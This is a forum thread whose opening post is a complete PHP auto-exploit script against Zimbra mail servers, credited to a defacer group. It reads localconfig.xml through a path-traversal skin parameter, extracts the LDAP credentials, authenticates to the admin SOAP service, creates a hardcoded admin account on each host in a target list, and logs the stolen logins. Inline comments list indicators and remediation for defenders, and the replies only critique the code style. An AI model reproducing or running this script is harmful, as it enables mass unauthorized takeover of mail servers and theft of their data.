

Zimbra Privilege Escalation



03-06-2017, 09:49 PM #1
shor7cut Offline Junior Member **
Code:
<?php
/**
* Name       : Auto Exploit Zimbra Privilegie Escalation LFI v.1b061614
* Author     : Shor7cut
* Website    : http://facebook.com/bug7sec
* Thank's    : Sohai & Tu5b0l3d
*----------------------------------------------
* BUG7SEC TEAM | INDOXPLOIT | TUBAN CYBER TEAM | DEFACER TERSAKITI
*----------------------------------------------
*/
// Turn off PHP error reporting for the whole run, so the only feedback on the
// console is what the script echoes itself.
error_reporting(0);
// Execution-time limit call, reproduced as published.
set_time_limit();
/**
 * Single-class command-line tool. For every host in a list it requests
 * Zimbra's localconfig.xml through a path-traversal value in the `skin`
 * parameter, takes the zimbra_user / zimbra_ldap_password values out of the
 * response, authenticates to the admin SOAP service on port 7071 with them,
 * and creates a new account that it then flags zimbraIsAdminAccount=TRUE.
 *
 * Reviewer notes for defenders, all derived from literals visible in this class:
 *  - Web-log indicator: a request under res/ ending in .js.zgz whose skin=
 *    parameter contains repeated ../ segments, the path
 *    opt/zimbra/conf/localconfig.xml and a trailing %00.
 *  - Account indicator: a mailbox whose local part is "service-pasypalss"
 *    carrying the admin flag.
 *  - Admin-API indicator: AuthRequest, GetAllDomainsRequest,
 *    CreateAccountRequest and ModifyAccountRequest arriving back to back on
 *    the admin SOAP endpoint from an unfamiliar source address.
 *  - Weak network indicator: the fixed Firefox 32 User-Agent string set in
 *    post() and get().
 *  - Response: if localconfig.xml was served to an outside client, treat the
 *    LDAP password in it as disclosed (rotate it), review every account with
 *    the admin flag, keep port 7071 reachable from management networks only,
 *    and apply the vendor fix for the skin-parameter file disclosure.
 */
class zimbra
{
/**
 * Send an HTTP POST and return whatever curl_exec() returns
 * (CURLOPT_RETURNTRANSFER is set, so that is the response text).
 *
 * TLS peer and host verification are both switched off, redirects are
 * followed, and cookies are read from and written to a file named
 * 'coker_log' in the working directory.
 *
 * @param string $url  Request URL.
 * @param mixed  $post Request body handed to CURLOPT_POSTFIELDS.
 */
public function post($url,$post)
{
$ch = curl_init ($url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT ,0);
curl_setopt ($ch, CURLOPT_TIMEOUT, 30); //timeout in seconds
curl_setopt ($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt ($ch, CURLOPT_COOKIEFILE,'coker_log');
return curl_exec ($ch);
}
/**
 * Send an HTTP GET and return whatever curl_exec() returns.
 *
 * Same client profile as post(): TLS verification off, redirects followed,
 * the same User-Agent and the same 'coker_log' cookie file; additionally
 * asks for gzip content encoding.
 *
 * @param string $url Request URL.
 */
public function get($url){
$ch = curl_init ($url);
       curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
       curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
       curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
       curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
       curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
       curl_setopt ($ch, CURLOPT_ENCODING, "gzip");
       curl_setopt ($ch, CURLOPT_COOKIEJAR,'coker_log');
       curl_setopt ($ch, CURLOPT_COOKIEFILE,'coker_log');
       curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT ,0);
curl_setopt ($ch, CURLOPT_TIMEOUT, 30); //timeout in seconds
       return curl_exec($ch);
}

/**
 * Wrap an admin request in a SOAP envelope that carries $token as the
 * authToken in the header context, and POST it to the admin SOAP endpoint
 * on port 7071 of $url.
 *
 * @param string $url   Host name or address (no scheme; https is prepended).
 * @param string $token Admin auth token taken from an earlier AuthRequest.
 * @param string $body  XML placed inside the SOAP Body element.
 */
public function soap($url,$token,$body){
$body = "<soap:Envelope xmlns:soap=\"http://www.w3.org/2003/05/soap-envelope\"><soap:Header><context xmlns=\"urn:zimbra\"><authToken>$token</authToken></context></soap:Header><soap:Body>$body</soap:Body></soap:Envelope>";
return zimbra::post("https://$url:7071/service/admin/soap",$body);
}
/**
 * Run the whole chain against one host and record the outcome.
 *
 * Order of operations as written: GET the traversal URL, extract the
 * zimbra_user and zimbra_ldap_password values from the response, send an
 * AuthRequest to the admin SOAP endpoint, list domains, create an account,
 * set zimbraIsAdminAccount on it, then append the new login details to two
 * local log files.
 *
 * @param string $url      Target host as given in the input list.
 * @param string $payload  Full URL of the file-disclosure request.
 * @param string $username Local part of the account to create.
 * @param string $password Password of the account to create.
 */
function exploit($url,$payload,$username,$password){
echo "[".date("H:i:s")."][Payload]   : ";
$result = zimbra::get($payload);
echo "Success\n";
// Split the response on the two key markers and capture the value that follows each.
$ruser = explode('<key"]="name=\"zimbra_user\">', $result);
preg_match('/a\["<value>(.*?)<\/value>/', $ruser[1], $matchUser);
$rpass = explode('<key"]="name=\"zimbra_ldap_password\">', $result);
                   preg_match('/a\["<value>(.*?)<\/value>/', $rpass[1], $matchUserpass);
       echo "[".date("H:i:s")."][Create Ac] : ";
       // Continue only when both values were captured from the response.
       if($matchUser[1] && $matchUserpass[1]){
        echo "Success \r\n\n";
        // Admin AuthRequest using the service user and LDAP password read from localconfig.xml.
        $body = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
                  <env:Envelope xmlns:env=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:ns1=\"urn:zimbraAdmin\" xmlns:ns2=\"urn:zimbraAdmin\"><env:Header><ns2:context/></env:Header><env:Body><ns1:AuthRequest><account by=\"name\">$matchUser[1]</account><password>$matchUserpass[1]</password></ns1:AuthRequest></env:Body></env:Envelope>";
          preg_match('/<authToken>(.*)<\/authToken>/', zimbra::post("https://$url:7071/service/admin/soap",$body) , $tetek);
       if(isset($tetek[1])){        
       // Three admin calls in a row: list domains, create the account, mark it as admin.
       // Where admin SOAP requests are logged, this sequence is the server-side trace to look for.
       $domain  = zimbra::soap($url,$tetek[1],@("<GetAllDomainsRequest xmlns=\"urn:zimbraAdmin\"></GetAllDomainsRequest>"));
       preg_match('/<a n=\"zimbraDomainName\">(.*?)<\/a>/', $domain, $domainMatch);
       $account = zimbra::soap($url,$tetek[1],@("<CreateAccountRequest xmlns=\"urn:zimbraAdmin\"><name>$[email protected]$domainMatch[1]</name><password>$password</password></CreateAccountRequest>"));
       $re      = "/account id=\"(.*?)\" name=\"(.*?)\"/"; preg_match($re, $account, $matches);
       $modCc = zimbra::soap($url,$tetek[1],@("<ModifyAccountRequest xmlns=\"urn:zimbraAdmin\"><id>$matches[1]</id><a n=\"zimbraIsAdminAccount\">TRUE</a></ModifyAccountRequest>"));
       $resent  = "/<a n=\"zimbraMailTrustedSenderListMaxNumEntries\">(.*)<\\/a>/";


/*         echo "[".date("H:i:s")."]->>[ Username : $[email protected]".$domainMatch[1]."\n";
        echo "[".date("H:i:s")."]->>[ Password : ".$password."\n";
        echo "[".date("H:i:s")."]-<<[ Login    : https://".$domainMatch[1]."/zimbraAdmin\n";
        echo "[".date("H:i:s")."]-<<[ Login    : https://".$url.":7071/zimbraAdmin\n\n";*/
// Forensic artifact on the machine running the tool: two append-mode files in the
// working directory, named with the current date, holding the login URL, account
// name and password in plain text (second file: domain|account|password per line).
$file = fopen("shor7cut-Zimbra".date("d-m-Y").".log","a");
fwrite($file,"Login ip : https://".$url."/:7071/zimbraAdmin\r\nLogin Url : https://".$domainMatch[1]."/zimbraAdmin\r\nUsername : ".$username."@".$domainMatch[1]."\r\nPassword : ".$password."\r\n\n");
fclose($file);
$file = fopen("shor7cut-ZimbraCheckers".date("d-m-Y").".log","a");
fwrite($file,$domainMatch[1]."|".$username."@".$domainMatch[1]."|".$password."\r\n");
fclose($file);
       }
       }else{
        echo "Failed \r\n\n";
       }

}
/**
 * Print the tool's banner text.
 */
public function covers(){
print("
    @[email protected]   Auto Exploiter  -[>{ SHOR7CUT }<]-
   (\--/)  Zimbra Privilegie Escalation
  (.>__<.) LFI v.1b061614
  ^^^  ^^^
  --help / -h
")."\r\n";
}
/**
 * Build the request for one host and hand it to exploit().
 *
 * The account name and password to be created are fixed literals, and the
 * request path is a fixed string ending in a traversal to
 * /opt/zimbra/conf/localconfig.xml followed by %00. Both are stable strings
 * a defender can search web logs and the account directory for.
 *
 * @param string $url Target host as read from the input list.
 */
public function site($url){
$username = "service-pasypalss"; $password = "sHosR7cuTss";
$payload = "res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00";
$linkPayload = $url."/".$payload;
zimbra::exploit($url,$linkPayload,$username,$password);
}
/**
 * Turn the raw argument list into an associative array.
 *
 * An argument matching --name=value is stored as $_ARG['name'] = 'value';
 * one starting with a single dash and an alphanumeric character is stored
 * under that character with the string 'true'; anything else is appended
 * to $_ARG['input'].
 *
 * @param array $argv Raw command-line arguments.
 * @return array Parsed arguments.
 */
function arguments($argv) {
   $_ARG = array();
   foreach ($argv as $arg) {
     if (ereg('--([^=]+)=(.*)',$arg,$reg)) {
       $_ARG[$reg[1]] = $reg[2];
     } elseif(ereg('^-([a-zA-Z0-9])',$arg,$reg)) {
           $_ARG[$reg[1]] = 'true';
     } else {
           $_ARG['input'][]=$arg;
     }
   }
  return $_ARG;
}
/**
 * Command-line driver: print the banner, parse the arguments, and when a
 * --file argument is present read that file, split it on CRLF and call
 * site() once per entry while echoing a running counter and the entry.
 *
 * The input is a list of hosts rather than a single host, so the same
 * request pattern can be expected against many unrelated servers in one run.
 *
 * @param array $argv Raw command-line arguments.
 */
function cli($argv){
$no=1;
zimbra::covers();
$argv = zimbra::arguments($argv);
if($argv['file']){
$lod = explode("\r\n", file_get_contents($argv['file']));
$tod = count($lod);
foreach ($lod as $key => $cites) {
// Progress line: current index | total entries | entries remaining.
echo "[".date("H:i:s")."][Kimcil]    : ".$no."|".$tod."|".($tod-$no)."\n";
echo "[".date("H:i:s")."][Target]    : ".$cites."\n";
zimbra::site($cites);$no++;
}
}if($argv['help'] || $argv['h']){
echo "\r\n[Command Helpers] php ".$argv[0]." --file=VULN.txt\r\n";
}
else{
zimbra::cover();
}
}

}
// Entry point: pass the process arguments to the class's CLI driver.
zimbra::cli($argv);
?>


source : pastebin

03-06-2017, 10:26 PM #2
1337 Offline Don't PM me for help, post it on forum ! *******
shor7cut , please share the codes in a [code] tag.


03-07-2017, 12:41 AM #3
shor7cut Offline Junior Member **
(03-06-2017, 10:26 PM)1337 Wrote:  shor7cut , please share the codes in a [code] tag.

oke.

06-14-2017, 03:41 AM #4
T3N38R15 Offline ? lawless-coder *****
Hey shor7cut,
why are you using a class when you are only calling static functions?
It would be better if you isolated the class :)

anyway, great job :)
